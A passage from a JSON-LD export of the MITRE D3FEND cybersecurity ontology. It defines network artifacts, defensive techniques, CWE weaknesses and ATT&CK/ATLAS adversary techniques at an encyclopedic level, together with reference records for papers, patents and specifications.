        "@id": "d3f:NetworkSession"
      },
      "d3f:summarizes": {
        "@id": "d3f:PacketCaptureFile"
      },
      "rdfs:label": "Packet Log",
      "rdfs:seeAlso": {
        "@id": "dbr:Packet_analyzer"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Log"
        },
        {
          "@id": "_:N16bc33f5882b4548aa24841386200a81"
        },
        {
          "@id": "_:Nafbcdede022640c1a95b436ba4aa62b9"
        }
      ]
    },
    {
      "@id": "_:N16bc33f5882b4548aa24841386200a81",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "_:Nafbcdede022640c1a95b436ba4aa62b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:summarizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PacketCaptureFile"
      }
    },
    {
      "@id": "d3f:Variance",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-VAR",
      "d3f:definition": "Variance is a measure of dispersion, meaning it is a measure of how far a set of numbers is spread out from their average value.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Variance. [Link](https://en.wikipedia.org/wiki/Variance)",
      "rdfs:label": "Variance",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:WindowsShortcutFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Microsoft Windows shortcut file.",
      "rdfs:label": "Windows Shortcut File",
      "rdfs:seeAlso": [
        {
          "@id": "http://dbpedia.org/resource/Shortcut_(computing)#Microsoft_Windows"
        },
        {
          "@id": "http://dbpedia.org/resource/Symbolic_link#Shortcuts"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ShortcutFile"
      },
      "skos:altLabel": "Shell Link"
    },
    {
      "@id": "d3f:T1430.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1430.002",
      "d3f:definition": "Adversaries may exploit the lack of authentication in signaling system network nodes to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport)",
      "rdfs:label": "Impersonate SS7 Nodes - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1430"
      },
      "skos:prefLabel": "Impersonate SS7 Nodes"
    },
    {
      "@id": "d3f:ApplicationFailureCountVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Variables that keep count of various failures and errors.",
      "rdfs:comment": "Differenct controller brands have different system tags to monitor various aspects, for example in Allen-Bradley you might use S:ERR, T4:0.DN, C5:0.OV; respectively System error, timer/counter status bits",
      "rdfs:label": "Application Failure Count Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:CWE-1091",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1091",
      "d3f:definition": "The product contains a method that accesses an object but does not later invoke the element's associated finalize/destructor method.",
      "rdfs:label": "Use of Object without Invoking Destructor Method",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1076"
        },
        {
          "@id": "d3f:CWE-772"
        }
      ]
    },
    {
      "@id": "d3f:InboundInternetNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Inbound internet traffic is network traffic from a host outside a given network initiated on an incoming connection to a host inside that network.",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Inbound Internet Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InboundNetworkTraffic"
        },
        {
          "@id": "d3f:InternetNetworkTraffic"
        },
        {
          "@id": "_:N643eb8bf244f47078f2ef0eb3fe13f1b"
        }
      ]
    },
    {
      "@id": "_:N643eb8bf244f47078f2ef0eb3fe13f1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-1119",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1119",
      "d3f:definition": "The code uses too many unconditional branches (such as \"goto\").",
      "rdfs:label": "Excessive Use of Unconditional Branching",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1501",
      "@type": "owl:Class",
      "d3f:attack-id": "T1501",
      "d3f:definition": "Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.002",
      "rdfs:label": "Systemd Service",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-278",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-278",
      "d3f:definition": "A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement.",
      "rdfs:label": "Insecure Preserved Inherited Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:contains",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "d3f:definition": "x contains y: A core relation that holds between a whole x and its part y.  Equivalent to relational concept 'has part' and thus transitive.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02639021-v"
      },
      "rdfs:label": "contains",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-contain"
        }
      ]
    },
    {
      "@id": "d3f:T1134.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.002",
      "d3f:copies": {
        "@id": "d3f:AccessToken"
      },
      "d3f:definition": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)",
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Create Process with Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:N5d3201d94fad43fb8be613fff8c83db0"
        },
        {
          "@id": "_:N7ebc4496d364424a92a7e644f0ec9f12"
        }
      ]
    },
    {
      "@id": "_:N5d3201d94fad43fb8be613fff8c83db0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "_:N7ebc4496d364424a92a7e644f0ec9f12",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:UserAccountCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the creation of a new user account within a system or domain.",
      "rdfs:label": "User Account Creation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccountEvent"
      }
    },
    {
      "@id": "d3f:AML.T0000.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0000.002",
      "d3f:definition": "Research labs at academic institutions and company R&D divisions often have blogs that highlight their use of artificial intelligence and its application to the organization's unique problems.\nIndividual researchers also frequently document their work in blogposts.\nAn adversary may search for posts made by the target victim organization or its employees.\nIn comparison to [Journals and Conference Proceedings](/techniques/AML.T0000.000) and [Pre-Print Repositories](/techniques/AML.T0000.001) this material will often contain more practical aspects of the AI system.\nThis could include underlying technologies and frameworks used, and possibly some information about the API access and use case.\nThis will help the adversary better understand how that organization is using AI internally and the details of their approach that could aid in tailoring an attack.",
      "rdfs:label": "Technical Blogs - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0000.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0000"
      },
      "skos:prefLabel": "Technical Blogs"
    },
    {
      "@id": "d3f:T1592.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592.003",
      "d3f:definition": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).",
      "rdfs:label": "Firmware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1592"
      }
    },
    {
      "@id": "d3f:Reference-AnalysisOfTheWindowsVistaSecurityModel_SymantecCorporation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://web.archive.org/web/20140407025337/http://www.symantec.com/avcenter/reference/Windows_Vista_Security_Model_Analysis.pdf"
      },
      "d3f:kb-abstract": "This     paper     provides     an     in-depth     technical     assessment    of    the    security    improvements    implemented    in    Windows Vista, focusing primarily on the areas of User Account Protection  and  User  Interface  Privilege  Isolation.  This  paper  discusses   these   features   and   touches   on   several   of   their   shortcomings. It then demonstrates how it is possible to combine these  attacks  to  gain  full  control  over  the  machine  from  low  integrity, low privilege process.",
      "d3f:kb-author": "Matthew Conover",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Symantec Corporation",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:kb-reference-title": "Analysis of the Windows Vista Security Model",
      "rdfs:label": "Reference - Analysis of the Windows Vista Security Model - Symantec Corporation"
    },
    {
      "@id": "d3f:WindowsRegistryEvent",
      "@type": "owl:Class",
      "d3f:definition": "Events involving interactions with the Windows Registry, including keys, values, and associated security configurations.",
      "rdfs:label": "Windows Registry Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N5dade0f07ffa4e8798a7ee691eeed2a2"
        }
      ]
    },
    {
      "@id": "_:N5dade0f07ffa4e8798a7ee691eeed2a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistry"
      }
    },
    {
      "@id": "d3f:NetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:NetworkPacket"
      },
      "d3f:definition": "Network traffic or data traffic is the data, or alternatively the amount of data, moving across a network at a given point of time.  Network data in computer networks is mostly encapsulated in network packets, which provide the load in the network.",
      "d3f:may-contain": [
        {
          "@id": "d3f:DomainName"
        },
        {
          "@id": "d3f:RemoteCommand"
        }
      ],
      "d3f:originates-from": {
        "@id": "d3f:PhysicalLocation"
      },
      "rdfs:label": "Network Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Network_traffic"
        },
        {
          "@id": "https://schema.ocsf.io/objects/network_traffic"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N04f90ec93d324eefaea85ebfc9f592c2"
        },
        {
          "@id": "_:Ne50d59ea7f4b40e9bf568bd5fa04c1fa"
        },
        {
          "@id": "_:N370bb106275d4133b4515cd986ef4c76"
        },
        {
          "@id": "_:Nade1915eb98043a09b6adec531ee680a"
        }
      ],
      "skos:altLabel": "Data Traffic"
    },
    {
      "@id": "_:N04f90ec93d324eefaea85ebfc9f592c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkPacket"
      }
    },
    {
      "@id": "_:Ne50d59ea7f4b40e9bf568bd5fa04c1fa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainName"
      }
    },
    {
      "@id": "_:N370bb106275d4133b4515cd986ef4c76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "_:Nade1915eb98043a09b6adec531ee680a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:originates-from"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLocation"
      }
    },
    {
      "@id": "d3f:T1489",
      "@type": "owl:Class",
      "d3f:attack-id": "T1489",
      "d3f:definition": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)",
      "rdfs:label": "Service Stop",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:ServiceAccount",
      "@type": "owl:Class",
      "d3f:definition": "A service account is a type of account used by an application or service to interact with the operating system.",
      "d3f:synonym": "System Account",
      "rdfs:label": "Service Account",
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-002729_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined security safeguards to protect the integrity of boot firmware in organization-defined devices.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002729"
    },
    {
      "@id": "d3f:T1614",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:ConfigurationResource"
      },
      "d3f:attack-id": "T1614",
      "d3f:definition": "Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "rdfs:label": "System Location Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N122ce95548c94afdb2a0b6fab1e49cab"
        }
      ]
    },
    {
      "@id": "_:N122ce95548c94afdb2a0b6fab1e49cab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:BayesianLinearRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BLR",
      "d3f:definition": "Bayesian linear regression is a type of conditional modeling in which the mean of one variable is described by a linear combination of other variables, with the goal of obtaining the posterior probability of the regression coefficients.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Bayesian linear regression. [Link](https://en.wikipedia.org/wiki/Bayesian_linear_regression)",
      "rdfs:label": "Bayesian Linear Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:T1583",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583",
      "d3f:definition": "Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.",
      "rdfs:label": "Acquire Infrastructure",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForIdentifyingThePresenceOfMalwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9807114B2/en?oq=US-9807114-B2"
      },
      "d3f:kb-abstract": "A system for identifying the presence of advanced persistent threats on a network including a plurality of resources, interconnected to form a network, at least one decoy resource, at least one mini-trap installed on at least one of the plurality of resources and functionally associated with at one of the at least one decoy resource, the at least one mini-trap comprising deceptive information directing malware accessing the at least one mini-trap to the decoy resource associated therewith, and a manager node forming part of the network, locally or remotely, and configured to manage placement of the at least one mini-trap on the at least one of the plurality of resources and association between the at least one mini-trap and the decoy resource associated therewith.",
      "d3f:kb-author": "Doron Kolton; Rami Mizrahi; Omer Zohar; Benny Ben-Rabi; Alex Barbalat; Shlomi Gabai",
      "d3f:kb-mitre-analysis": "Questionable or all files (as determined by the enterprise) are forwarded to the decoy network. Using a manager node user interface, you can set up fake information (ex. IP address of a decoy FTP server) and deploy decoy physical or virtual endpoints.",
      "d3f:kb-organization": "Fidelis Cybersecurity Solutions Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DecoyNetworkResource"
        },
        {
          "@id": "d3f:DecoyUserCredential"
        }
      ],
      "d3f:kb-reference-title": "System and method for identifying the presence of malware using mini-traps set at network endpoints",
      "rdfs:label": "Reference - System and method for identifying the presence of malware using mini-traps set at network endpoints - Fidelis Cybersecurity Solutions Inc"
    },
    {
      "@id": "d3f:enumerates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x enumerates y: The subject x takes the action of reading from a digital source y to acquire data and create a list of its contents.",
      "rdfs:label": "enumerates",
      "rdfs:subPropertyOf": {
        "@id": "d3f:reads"
      }
    },
    {
      "@id": "d3f:ATTACKICSLateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0109"
      },
      "rdfs:label": "Lateral Movement Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N491085505b7848448492af2ba0b0ad58"
        }
      ],
      "skos:prefLabel": "Lateral Movement Technique"
    },
    {
      "@id": "_:N491085505b7848448492af2ba0b0ad58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0109"
      }
    },
    {
      "@id": "d3f:AMD64CodeSegment",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ImageCodeSegment",
        "d3f:ProcessCodeSegment"
      ],
      "rdfs:label": "AMD64 Code Segment"
    },
    {
      "@id": "d3f:CWE-692",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-692",
      "d3f:definition": "The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.",
      "rdfs:label": "Incomplete Denylist to Cross-Site Scripting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-184"
        },
        {
          "@id": "d3f:CWE-79"
        }
      ]
    },
    {
      "@id": "d3f:Reference-HowToChangeRegistryValuesOrPermissionsFromACommandLineOrAScript",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/troubleshoot/windows-client/application-management/change-registry-values-permissions"
      },
      "d3f:kb-abstract": "This article describes how to change registry values or permissions from a command line or a script.\n\nApplies to:   Windows 10 - all editions, Windows Server 2012 R2\nOriginal KB number:   264584",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-title": "How to change registry values or permissions from a command line or a script",
      "rdfs:label": "Reference - How to change registry values or permissions from a command line or a script"
    },
    {
      "@id": "d3f:CWE-9",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-9",
      "d3f:definition": "If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the product.",
      "rdfs:label": "J2EE Misconfiguration: Weak Access Permissions for EJB Methods",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-266"
      }
    },
    {
      "@id": "d3f:AML.TA0010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0010",
      "d3f:definition": "The adversary is trying to steal AI artifacts or other information about the AI system.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network.\nData may be stolen for its valuable intellectual property, or for use in staging future operations.\n\nTechniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.",
      "rdfs:label": "Exfiltration - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Exfiltration"
    },
    {
      "@id": "d3f:ReissueCredential",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ReissueCredential"
      ],
      "d3f:d3fend-id": "D3-RIC",
      "d3f:definition": "Issue a new credential to a user which supersedes their old credential.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Reissue Credential",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreAccess"
        },
        {
          "@id": "_:N69ba1dbe3f2048578c846ea8d37ec60c"
        }
      ]
    },
    {
      "@id": "_:N69ba1dbe3f2048578c846ea8d37ec60c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:OTRemoteModeCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Command that places the controller in a mode capable of receiving read/write communication from a networked entity.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Remote Mode Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N063a6280f0fc469985b315c41914f09e"
        }
      ]
    },
    {
      "@id": "_:N063a6280f0fc469985b315c41914f09e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:RestoreNetworkAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreNetworkAccess"
      ],
      "d3f:d3fend-id": "D3-RNA",
      "d3f:definition": "Restoring an entity's access to a computer network.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Host"
      },
      "rdfs:label": "Restore Network Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreAccess"
        },
        {
          "@id": "_:Nd3c31ad4d8ad4cf59b2438119176b4c7"
        }
      ]
    },
    {
      "@id": "_:Nd3c31ad4d8ad4cf59b2438119176b4c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:MemoryAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": {
        "@id": "d3f:MemoryWord"
      },
      "d3f:definition": "In computing, a memory address is a reference to a specific memory location used at various levels by software and hardware.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Memory_address"
      },
      "rdfs:label": "Memory Address",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:N967fe0cb97dc47539fa62771ddaba238"
        }
      ]
    },
    {
      "@id": "_:N967fe0cb97dc47539fa62771ddaba238",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryWord"
      }
    },
    {
      "@id": "d3f:Reference-TCGTrustedAttestationProtocolUseCasesForTPMFamilies1.2And2.0AndDICE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://trustedcomputinggroup.org/wp-content/uploads/TCG_TNC_TAP_Use_Cases_v1r0p35_published.pdf"
      },
      "d3f:kb-reference-title": "TCG Trusted Attestation Protocol Use Cases for TPM Families 1.2 and 2.0 and DICE",
      "rdfs:label": "Reference - TCG Trusted Attestation Protocol Use Cases for TPM Families 1.2 and 2.0 and DICE"
    },
    {
      "@id": "d3f:PointEstimation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PE",
      "d3f:definition": "A point estimation is a single value that estimates the parameter. Point estimates are single values calculated from the sample.",
      "d3f:kb-article": "## References\nPennsylvania State University. (n.d.). Statistical Inference and Estimation. [Link](https://online.stat.psu.edu/stat504/lesson/statistical-inference-and-estimation)",
      "rdfs:label": "Point Estimation",
      "rdfs:subClassOf": {
        "@id": "d3f:Estimation"
      }
    },
    {
      "@id": "d3f:T1068",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1068",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.",
      "d3f:enables": {
        "@id": "d3f:TA0004"
      },
      "d3f:may-modify": {
        "@id": "d3f:StackFrame"
      },
      "d3f:modifies": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "rdfs:label": "Exploitation for Privilege Escalation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:N33225ba32a614353ab830627544401d5"
        },
        {
          "@id": "_:Nfac977de993a44279719640cb7cd5df0"
        },
        {
          "@id": "_:Nfad5a24d850a419e8bcf863289fb28af"
        }
      ]
    },
    {
      "@id": "_:N33225ba32a614353ab830627544401d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0004"
      }
    },
    {
      "@id": "_:Nfac977de993a44279719640cb7cd5df0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "_:Nfad5a24d850a419e8bcf863289fb28af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:DisplayServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A display server or window server is a program whose primary task is to coordinate the input and output of its clients to and from the rest of the operating system, the hardware, and each other. The display server communicates with its clients over the display server protocol, a communications protocol, which can be network-transparent or simply network-capable. The display server is a key component in any graphical user interface, specifically the windowing system.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Display_server"
      },
      "rdfs:label": "Display Server",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Window Server"
    },
    {
      "@id": "d3f:WebApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application which is delivered by a web server over HTTP protocols that is presented to a client web browser.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Web_application"
      },
      "rdfs:label": "Web Application",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplication"
      },
      "skos:altLabel": [
        "Web App",
        "Web Application"
      ]
    },
    {
      "@id": "d3f:WebAccessToken",
      "@type": "owl:Class",
      "d3f:definition": "A web access token is a credential that allows a web client application to access a specific resource to perform specific actions on behalf of the user.",
      "d3f:synonym": "WAT",
      "rdfs:label": "Web Access Token",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:JSON_Web_Token"
        },
        {
          "@id": "https://auth0.com/blog/id-token-access-token-what-is-the-difference/"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:SessionToken"
      }
    },
    {
      "@id": "d3f:T1037",
      "@type": "owl:Class",
      "d3f:attack-id": "T1037",
